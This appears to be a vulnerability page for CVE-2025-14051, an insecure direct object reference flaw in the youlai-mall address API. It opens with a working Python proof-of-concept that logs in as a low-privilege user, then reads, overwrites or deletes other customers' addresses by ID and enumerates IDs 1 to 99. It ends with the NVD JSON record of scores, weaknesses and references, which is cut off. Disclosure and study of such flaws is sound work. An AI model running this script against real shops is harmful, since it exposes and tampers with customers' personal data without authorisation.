CVE-2025-14051

import requests import json # CVE-2025-14051 PoC - youlai-mall IDOR in Address Management # Target: youlaitech youlai-mall 1.0.0/2.0.0 BASE_URL = "http://target-server.com" TARGET_API = "/mall-ums/app-api/v1/addresses" # Authentication (low privilege account required) LOGIN_URL = f"{BASE_URL}/mall-ums/app-api/v1/login" login_data = { "username": "[email protected]", "password": "password123" } def get_auth_token(): """Obtain authentication token""" response = requests.post(LOGIN_URL, json=login_data) if response.status_code == 200: return response.json().get("data", {}).get("token") return None def exploit_get_address(token, target_address_id): """IDOR - Read other user's address""" headers = {"Authorization": f"Bearer {token}"} url = f"{BASE_URL}{TARGET_API}/getById" params = {"id": target_address_id} response = requests.get(url, headers=headers, params=params) print(f"[*] Get Address ID {target_address_id}: {response.json()}") return response.json() def exploit_update_address(token, target_address_id): """IDOR - Modify other user's address""" headers = {"Authorization": f"Bearer {token}"} url = f"{BASE_URL}{TARGET_API}/updateAddress" payload = { "id": target_address_id, "address": "Hacked Address", "phone": "1234567890", "consignee": "Attacker" } response = requests.put(url, headers=headers, json=payload) print(f"[*] Update Address ID {target_address_id}: {response.status_code}") return response def exploit_delete_address(token, target_address_id): """IDOR - Delete other user's address""" headers = {"Authorization": f"Bearer {token}"} url = f"{BASE_URL}{TARGET_API}/deleteAddress" params = {"id": target_address_id} response = requests.delete(url, headers=headers, params=params) print(f"[*] Delete Address ID {target_address_id}: {response.status_code}") return response if __name__ == "__main__": token = get_auth_token() if token: # Enumerate and exploit address IDs for addr_id in range(1, 100): exploit_get_address(token, addr_id)

{"cve": {"id": "CVE-2025-14051", "sourceIdentifier": "[email protected]", "published": "2025-12-04T23:15:46.553", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in youlaitech youlai-mall 1.0.0/2.0.0. Affected is the function getById/updateAddress/deleteAddress of the file /mall-ums/app-api/v1/addresses/. Executing manipulation can lead to improper control of dynamically-identified variables. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-913"}, {"lang": "en", "value": "CWE-914"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:youlai:youlai-mall:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CDAC2C90-64E9-4C14-BDC5-36F1178708EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:youlai:youlai-mall:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E843DD0-1FE2-4487-B584-A33F72DDCBDF"}]}]}], "references": [{"url": "https://github.com/Hwwg/cve/issues/18", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/Hwwg/cve/issues/19", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334367", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334367", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.694827", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.694836", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Ent ... (truncated)